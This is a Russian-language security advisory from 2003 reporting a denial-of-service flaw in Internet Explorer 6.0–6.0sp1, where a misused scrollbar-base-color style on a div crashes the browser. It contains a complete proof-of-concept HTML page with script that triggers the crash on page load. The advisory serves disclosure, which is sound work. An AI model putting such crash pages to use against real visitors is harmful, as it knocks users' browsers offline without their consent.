DoS против Microsoft Internet Explorer

Дата публикации:
27.10.2003
Всего просмотров:
1240
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer 6.0 – 6.0sp1

Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может вызвать отказ в обслуживании.

Проблема связанна с некорректной обработкой scrollbar-base-color атрибута div объекта. В результате удаленный атакующий может создать Web страницу, содержащую произвольный код сценария, чтобы аварийно завершить работу браузера пользователя, пытающего просмотреть эту Web страницу.

Пример/Эксплоит:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
<html> 
<head> 
<title>CRASH-IE</title> 
<style type="text/css"> 
html, body { 
overflow-y: hidden; 
scrollbar-base-color: '#330066'; 
} 

.crash { 
position:absolute; 
left:200px; 
top:200px; 
width:200px; 
} 

</style> 
<script type="text/javascript"> 
function galgenfrist() { 
window.setTimeout('crashIE();',1000); 
} 

function crashIE() { 
var moveNode = document.getElementById("move"); 
if(moveNode) { 
moveNode.style.top = "100px"; 
moveNode.style.left = "200px"; 
} 
} 
</script> 
</head> 
<body onload="galgenfrist();"> 
<h1>CRASH-IE</h1> 
<div id="move" class="crash"> 
<table> 
<tbody> 
<tr> 
<td> 
<textarea></textarea> 
</td> 
</tr> 
</tbody> 
</table> 
</div> 
</body> 
</html>

URL производителя:http://www.microsoft.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: IE6 CSS-Crash

или введите имя

CAPTCHA